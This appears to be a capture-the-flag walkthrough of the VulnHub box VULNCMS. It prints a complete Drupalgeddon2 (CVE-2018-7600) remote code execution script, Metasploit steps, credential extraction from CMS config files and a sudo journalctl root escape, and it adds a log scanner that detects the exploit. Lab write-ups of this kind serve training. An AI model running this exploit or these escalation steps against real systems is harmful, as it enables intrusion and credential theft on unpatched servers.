VulnHub practice box: VULNCMS

Box download link: https://www.vulnhub.com/entry/vulncms-1,710/

Description

This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.

Hint: Proceed in the given order :P

Information gathering

nmap -sV -sC -A 192.168.169.143 shows ports 22, 80, 5000, 8081 and 9001 open.


Port 80 serves a w3.css page, port 5000 WordPress, port 8081 Joomla and port 9001 Drupal. After testing, the Drupal instance on port 9001 turned out to be the exploitable one.

Exploitation

This Drupal version has an RCE; I'll just drop the exploit in here.

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
    parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
        epilog= '''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
    parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
    parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
    parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
    parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
    args = parser.parse_args()
    return args

def pwn_target(target, function, command, proxy):
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    print('[*] Poisoning a form and including it in cache.')
    get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
    post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
    r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, "html.parser")
    try:
        form = soup.find('form', {'id': 'user-pass'})
        form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
        if form_build_id:
            print('[*] Poisoned form ID: ' + form_build_id)
            print('[*] Triggering exploit to execute: ' + command)
            get_params = {'q':'file/ajax/name/#value/' + form_build_id}
            post_params = {'form_build_id':form_build_id}
            r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
            parsed_result = r.text.split('[{"command":"settings"')[0]
            print(parsed_result)
    except:
        print("ERROR: Something went wrong.")
        raise

def main():
    print ()
    print ('=============================================================================')
    print ('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)          |')
    print ('|                                  by pimps                                 |')
    print ('=============================================================================\n')

    args = get_args() # get the cl args
    pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
    main()
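A defender-side counterpart to the script above, added here and not part of the original post: it scans combined-format web access logs for the two request shapes this exploit produces, the Render API property keys (`#post_render`, `#markup`, `#type`) injected into the user/password query string, and the follow-up `file/ajax/name/#value/...` trigger. The log lines are constructed samples and the `/drupal/` path is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines in Apache/nginx "combined" format (not taken from the box).
# Line 2 mirrors the form-poisoning request, line 3 the file/ajax trigger that follows it.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Aug/2021:11:00:46 +0000] "GET /drupal/?q=user/password HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Aug/2021:11:01:02 +0000] "POST /drupal/?q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=id HTTP/1.1" 200 3344 "-" "python-requests/2.25.1"
10.0.0.9 - - [24/Aug/2021:11:01:03 +0000] "POST /drupal/?q=file/ajax/name/%23value/form-AbCdEf HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
10.0.0.7 - - [24/Aug/2021:11:02:10 +0000] "GET /drupal/?q=node/1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Drupal Form/Render API property keys; a browser never legitimately submits these.
RENDER_KEYS = ('#post_render', '#pre_render', '#markup', '#type', '#lazy_builder', '#access_callback')


def classify(line):
    """Return (kind, ip, q) for one log line; kind is 'poison', 'trigger' or None."""
    m = LOG_RE.match(line)
    if not m:
        return None, '', ''
    query = urlsplit(m['url']).query
    # parse_qsl decodes once; decode again so a double-encoded '#' (%2523) is still caught.
    params = [(unquote_plus(k), unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]
    q = dict(params).get('q', '')
    if any(key in k for k, _ in params for key in RENDER_KEYS):
        return 'poison', m['ip'], q
    # Second stage: a Render API property (#value) smuggled into the file/ajax path.
    if q.startswith('file/ajax/') and '#' in q:
        return 'trigger', m['ip'], q
    return None, m['ip'], q


def scan(log_text):
    """Return [(kind, ip, q)] for every suspicious line, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit[0]]


if __name__ == '__main__':
    for kind, ip, q in scan(SAMPLE_LOG):
        print(f'[{kind}] {ip} q={q}')
```

A 'poison' hit followed within seconds by a 'trigger' from the same source is the full exploit chain; either one alone is still worth an alert, since the keys never appear in normal traffic.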

You can also just use msf here, which gives you a meterpreter session.

use exploit/multi/handler
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lport xxx
set lhost xxx
set rport xxx
set rhost xxx
run

python3 -c 'import pty; pty.spawn("/bin/bash");' upgrades to an interactive shell.

Checking /etc/passwd with cat /etc/passwd shows two users, elliot and tyrell. Presumably we need to get into both accounts, so let's dig through the databases of the three CMSs.

Drupal: /sites/default/settings.php

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal_db',
      'username' => 'drupal_admin',
      'password' => 'p@$$_C!rUP@!_cM5',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

Joomla: configuration.php

public $host = 'localhost';
public $user = 'joomla_admin';
public $password = 'j00m1_@_dBpA$$';

WordPress: wp-config.php

/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_admin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Hmm, I couldn't connect to the database from here, so the first flag is out of reach for now: brute-forcing the account password won't help either, because the real password sits in that database.

Post-exploitation and privilege escalation

Although the first flag is out of reach, the second one is still doable: in /drupal/misc there is a file called tyrell.pass containing tyrell's username and password.


Log in over SSH: ssh tyrell@192.168.169.143

After logging in, sudo -l shows that /bin/journalctl can be run with sudo, which is abusable because journalctl pipes its output through a pager (less) that allows shell escapes.
The lookup reference for this kind of binary is https://gtfobins.github.io/


Entering the following commands gives a root shell:

sudo journalctl
!/bin/sh
